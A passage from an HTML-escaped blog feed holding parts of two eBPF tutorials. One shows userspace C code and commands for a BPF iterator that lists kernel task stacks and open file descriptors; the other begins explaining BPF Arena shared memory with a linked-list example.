    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;link&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;fprintf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;stderr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"Failed to attach %s iterator&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="n"&gt;iter_fd&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_iter_create&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;bpf_link__fd&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;link&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;iter_fd&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;fprintf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;stderr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"Failed to create %s iterator: %d&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;iter_fd&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="n"&gt;bpf_link__destroy&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;link&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="k"&gt;while&lt;/span&gt; &lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="n"&gt;len&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;read&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;iter_fd&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;buf&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;buf&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;buf&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;len&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sc"&gt;'\0'&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"%s"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;buf&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="n"&gt;close&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;iter_fd&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;bpf_link__destroy&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;link&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;main&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;argc&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="o"&gt;**&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;task_stack_bpf&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;show_files&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="n"&gt;libbpf_set_print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;libbpf_print_fn&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="cm"&gt;/* Parse arguments */&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;argc&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="n"&gt;strcmp&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="s"&gt;"--files"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;show_files&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="n"&gt;argc&lt;/span&gt;&lt;span class="o"&gt;--&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="o"&gt;++&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="cm"&gt;/* Open BPF application */&lt;/span&gt;
    &lt;span class="n"&gt;skel&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;task_stack_bpf__open&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;fprintf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;stderr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"Failed to open BPF skeleton&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="cm"&gt;/* Configure filter before loading */&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;argc&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;strncpy&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;bss&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;target_comm&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;bss&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;target_comm&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"Filtering for tasks matching: %s&lt;/span&gt;&lt;span class="se"&gt;\n\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;]);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"Usage: %s [--files] [comm]&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;]);&lt;/span&gt;
        &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"  --files    Show open file descriptors instead of stacks&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"  comm       Filter by process name&lt;/span&gt;&lt;span class="se"&gt;\n\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="cm"&gt;/* Load BPF program */&lt;/span&gt;
    &lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;task_stack_bpf__load&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;err&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;fprintf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;stderr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"Failed to load BPF skeleton&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;goto&lt;/span&gt; &lt;span class="n"&gt;cleanup&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;show_files&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"=== BPF Task File Descriptor Iterator ===&lt;/span&gt;&lt;span class="se"&gt;\n\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="n"&gt;run_iterator&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"task_file"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;progs&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;dump_task_file&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"=== BPF Task Stack Iterator ===&lt;/span&gt;&lt;span class="se"&gt;\n\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="n"&gt;run_iterator&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"task"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;progs&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;dump_task_stack&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="nl"&gt;cleanup:&lt;/span&gt;
    &lt;span class="n"&gt;task_stack_bpf__destroy&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Understanding the User-Space Code
&lt;/h3&gt;

&lt;p&gt;The userspace program showcases how simple iterator usage is once you understand the pattern. The &lt;code&gt;run_iterator()&lt;/code&gt; function encapsulates the three-step iterator lifecycle. First, &lt;code&gt;bpf_program__attach_iter()&lt;/code&gt; attaches the BPF program to the iterator infrastructure, registering it to be called during iteration. Second, &lt;code&gt;bpf_iter_create()&lt;/code&gt; creates a file descriptor representing an iterator instance. Third, simple &lt;code&gt;read()&lt;/code&gt; calls consume the iterator output.&lt;/p&gt;

&lt;p&gt;Here's what makes this powerful: when you read from the iterator fd, the kernel transparently starts walking tasks or files. For each element, it calls your BPF program, passing the element's context. Your BPF code filters and formats output into a &lt;code&gt;seq_file&lt;/code&gt; buffer. The kernel accumulates this output and returns it through the &lt;code&gt;read()&lt;/code&gt; call. From userspace's perspective, it's just reading a file: all the iteration, filtering, and formatting complexity is hidden in the kernel.&lt;/p&gt;

&lt;p&gt;The main function handles mode selection and configuration. We parse command-line arguments to determine whether to show stacks or files, and what process name to filter for. Critically, we set &lt;code&gt;skel-&amp;gt;bss-&amp;gt;target_comm&lt;/code&gt; before loading the BPF program. This writes the filter string into the BPF program's global data section, making it visible to kernel code when the program runs. This is how we pass configuration from userspace to kernel without complex communication channels.&lt;/p&gt;

&lt;p&gt;After loading, we select which iterator to run based on the &lt;code&gt;--files&lt;/code&gt; flag. Both iterators use the same filtering logic, but produce different output - one shows stack traces, the other shows file descriptors. The shared filtering code demonstrates how BPF programs can implement reusable logic across different iterator types.&lt;/p&gt;

&lt;h2&gt;
  
  
  Compilation and Execution
&lt;/h2&gt;

&lt;p&gt;Navigate to the bpf_iters directory and build:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cd &lt;/span&gt;bpf-developer-tutorial/src/features/bpf_iters
make
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The Makefile compiles the BPF program with BTF support and generates a skeleton header containing the compiled bytecode embedded in C structures. This skeleton API makes BPF program loading trivial.&lt;/p&gt;

&lt;p&gt;Show kernel stack traces for all systemd processes:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo&lt;/span&gt; ./task_stack systemd
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Expected output:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Filtering for tasks matching: systemd

=== BPF Task Stack Iterator ===

=== Task: systemd (pid=1, tgid=1) ===
Stack depth: 6 frames
  [ 0] ep_poll+0x447/0x460
  [ 1] do_epoll_wait+0xc3/0xe0
  [ 2] __x64_sys_epoll_wait+0x6d/0x110
  [ 3] x64_sys_call+0x19b1/0x2310
  [ 4] do_syscall_64+0x7e/0x170
  [ 5] entry_SYSCALL_64_after_hwframe+0x76/0x7e

=== Summary: 1 task stacks shown ===
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Show open file descriptors for bash processes:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo&lt;/span&gt; ./task_stack &lt;span class="nt"&gt;--files&lt;/span&gt; bash
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Expected output:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Filtering for tasks matching: bash

=== BPF Task File Descriptor Iterator ===

COMM                 TGID      PID     FD FILE_OPS
bash                12345    12345      0 0xffffffff81e3c6e0
bash                12345    12345      1 0xffffffff81e3c6e0
bash                12345    12345      2 0xffffffff81e3c6e0
bash                12345    12345    255 0xffffffff82145dc0

=== Summary: 4 file descriptors shown ===
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Run without filtering to see all tasks:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo&lt;/span&gt; ./task_stack
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This shows stacks for every task in the system. On a typical desktop, this might display hundreds of tasks. Compare it with parsing &lt;code&gt;/proc/*/stack&lt;/code&gt; for all processes: the iterator walks the task list inside the kernel, without a separate open, read, and close for each process.&lt;/p&gt;

&lt;h2&gt;
  
  
  When to Use BPF Iterators vs /proc
&lt;/h2&gt;

&lt;p&gt;Choose &lt;strong&gt;BPF iterators&lt;/strong&gt; when you need filtered kernel data without userspace processing overhead, custom output formats that don't match &lt;code&gt;/proc&lt;/code&gt; text, performance-critical monitoring that runs frequently, or integration with BPF-based observability infrastructure. Iterators excel when you're monitoring many entities but only care about a subset, or when you need to aggregate and transform data in the kernel.&lt;/p&gt;

&lt;p&gt;Choose &lt;strong&gt;/proc&lt;/strong&gt; when you need simple one-off queries, are debugging or prototyping where development speed matters more than runtime performance, want maximum portability across kernel versions (iterators require relatively recent kernels), or run in restricted environments where you can't load BPF programs.&lt;/p&gt;

&lt;p&gt;The fundamental trade-off is processing location. Iterators push filtering and formatting into the kernel for efficiency and flexibility, while &lt;code&gt;/proc&lt;/code&gt; keeps the kernel simple and does all processing in userspace. For production monitoring of complex systems, iterators usually win due to their performance benefits and programming flexibility.&lt;/p&gt;

&lt;h2&gt;
  
  
  Summary and Next Steps
&lt;/h2&gt;

&lt;p&gt;BPF iterators change how we export kernel data by enabling programmable, filtered iteration directly from BPF code. Instead of repeatedly reading and parsing &lt;code&gt;/proc&lt;/code&gt; files, you write a BPF program that iterates kernel structures in-kernel, applies filtering at the source, and formats output exactly as needed. This avoids much of the overhead from syscalls, mode transitions, and userspace parsing, while leaving the output format entirely up to you.&lt;/p&gt;

&lt;p&gt;Our dual-mode iterator demonstrates both task and file iteration, showing how one BPF program can export multiple views of kernel data with shared filtering logic. The kernel handles complex iteration mechanics while your BPF code focuses purely on filtering and formatting. Iterators integrate seamlessly with standard Unix tools through their file descriptor interface, making them composable building blocks for sophisticated monitoring pipelines.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;If you'd like to dive deeper into eBPF, check out our tutorial repository at &lt;a href="https://github.com/eunomia-bpf/bpf-developer-tutorial" rel="noopener noreferrer"&gt;https://github.com/eunomia-bpf/bpf-developer-tutorial&lt;/a&gt; or visit our website at &lt;a href="https://eunomia.dev/tutorials/" rel="noopener noreferrer"&gt;https://eunomia.dev/tutorials/&lt;/a&gt;.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  References
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;BPF Iterator Documentation:&lt;/strong&gt; &lt;a href="https://docs.kernel.org/bpf/bpf_iterators.html" rel="noopener noreferrer"&gt;https://docs.kernel.org/bpf/bpf_iterators.html&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Kernel Iterator Selftests:&lt;/strong&gt; Linux kernel tree &lt;code&gt;tools/testing/selftests/bpf/*iter*.c&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Tutorial Repository:&lt;/strong&gt; &lt;a href="https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/features/bpf_iters" rel="noopener noreferrer"&gt;https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/features/bpf_iters&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;libbpf Iterator API:&lt;/strong&gt; &lt;a href="https://github.com/libbpf/libbpf" rel="noopener noreferrer"&gt;https://github.com/libbpf/libbpf&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;BPF Helpers Manual:&lt;/strong&gt; &lt;a href="https://man7.org/linux/man-pages/man7/bpf-helpers.7.html" rel="noopener noreferrer"&gt;https://man7.org/linux/man-pages/man7/bpf-helpers.7.html&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Examples adapted from Linux kernel BPF selftests with educational enhancements. Requires Linux kernel 5.8+ for iterator support, BTF enabled, and libbpf. Complete source code available in the tutorial repository.&lt;/p&gt;

</description>
      <category>ebpf</category>
      <category>iterator</category>
      <category>kernel</category>
    </item>
    <item>
      <title>eBPF Tutorial by Example: BPF Arena for Zero-Copy Shared Memory</title>
      <dc:creator>云微</dc:creator>
      <pubDate>Tue, 06 Jan 2026 07:19:17 +0000</pubDate>
      <link>https://forem.com/yunwei37/ebpf-tutorial-by-example-bpf-arena-for-zero-copy-shared-memory-nf</link>
      <guid>https://forem.com/yunwei37/ebpf-tutorial-by-example-bpf-arena-for-zero-copy-shared-memory-nf</guid>
      <description>&lt;p&gt;Ever tried building a linked list in eBPF and got stuck using awkward integer indices instead of real pointers? Or needed to share large amounts of data between your kernel BPF program and userspace without expensive syscalls? Traditional BPF maps force you to work around pointer limitations and require system calls for every access. What if you could just use normal C pointers and have direct memory access from both kernel and userspace?&lt;/p&gt;

&lt;p&gt;This is what &lt;strong&gt;BPF Arena&lt;/strong&gt; solves. Created by Alexei Starovoitov in 2024, arena provides a sparse shared memory region where BPF programs can use real pointers to build complex data structures like linked lists, trees, and graphs, while userspace gets zero-copy direct access to the same memory. In this tutorial, we'll build a linked list in arena memory and show you how both kernel and userspace can manipulate it using standard pointer operations.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;The complete source code: &lt;a href="https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/features/bpf_arena" rel="noopener noreferrer"&gt;https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/features/bpf_arena&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  Introduction to BPF Arena: Breaking Free from Map Limitations
&lt;/h2&gt;

&lt;h3&gt;
  
  
  The Problem: When BPF Maps Aren't Enough
&lt;/h3&gt;

&lt;p&gt;Traditional BPF maps are fantastic for simple key-value storage, but they have fundamental limitations when you need complex data structures or large-scale data sharing. Let's look at what developers faced before arena existed.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Ring buffers&lt;/strong&gt; only work in one direction - BPF can send data to userspace, but userspace can't write back. They're streaming-only, with no random access. &lt;strong&gt;Hash and array maps&lt;/strong&gt; typically require syscalls like &lt;code&gt;bpf_map_lookup_elem()&lt;/code&gt; for every access from userspace; array maps created with &lt;code&gt;BPF_F_MMAPABLE&lt;/code&gt; can be memory-mapped, but they still hold only a flat array of fixed-size values. Array maps allocate all their memory upfront, wasting space if you only use a fraction of entries. Most critically, &lt;strong&gt;you can't use real pointers&lt;/strong&gt; - you're forced to use integer indices to link data structures together.&lt;/p&gt;

&lt;p&gt;Building a linked list the old way looked like this mess:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;node&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;next_idx&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;  &lt;span class="c1"&gt;// Can't use pointers, must use index!&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;

&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;type&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;BPF_MAP_TYPE_ARRAY&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;max_entries&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;10000&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__type&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;node&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="n"&gt;nodes_map&lt;/span&gt; &lt;span class="nf"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;".maps"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

